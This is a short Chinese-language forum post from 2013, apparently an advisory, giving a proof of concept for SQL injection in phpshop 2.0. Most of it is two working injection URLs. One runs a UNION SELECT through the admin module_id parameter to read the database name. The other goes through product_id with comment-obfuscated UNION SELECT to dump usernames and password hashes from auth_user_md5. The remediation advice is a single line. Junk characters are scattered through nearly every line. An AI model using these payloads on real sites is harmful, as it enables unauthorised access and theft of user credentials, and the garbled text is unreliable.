标题 : phpshop 2.0 SQL Injection Vulnerability
6 X }% p# ]/ ]7 r8 I; t s$ ]/ E. ^* o- H, x) x
作者 : By onestree
" K4 M9 i: J" Y) S* z* v/ o下载地址 : http://code.google.com/p/phpshop/downloads/list
i1 P4 ^# E. Q! D% {测试地址: windows 7 / ubuntu
" \# H2 Y1 r" n. u1 j0 Z" [5 X # w; ^3 {5 Q( Y; M3 h$ `
( R6 _0 J$ w2 u, x4 P8 c2 S, b: V
SQLi p0c:1 P( R: w+ R6 t4 e2 M' b/ ]
& {( H* \3 S: c* Z! }7 i5 U
==================8 b" L" z# i+ O' Y5 l7 \
/ A0 ^# l! B. H2 c' ^$ }/ R# h# U
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
" F# V# l6 n5 G, b5 d: tunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 [) K. ^6 T0 |. J, H4 ?
: e$ L4 V% x* v. K5 y' E w; ^
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
, A! g* [8 g+ o- {' h/ h0 Y6 }0 I% k1 j. j0 Z: O4 f0 r
修复:6 f( D0 g! m9 f: y
加强过滤
! j; q. Y k% h
! m# C2 p: m( }+ r" v" ?0 g! ~
/ D0 L' G8 j6 L1 S4 Y [+ r2 X/ L |
发表于 2013-1-18 18:24:10
收藏
支持
反对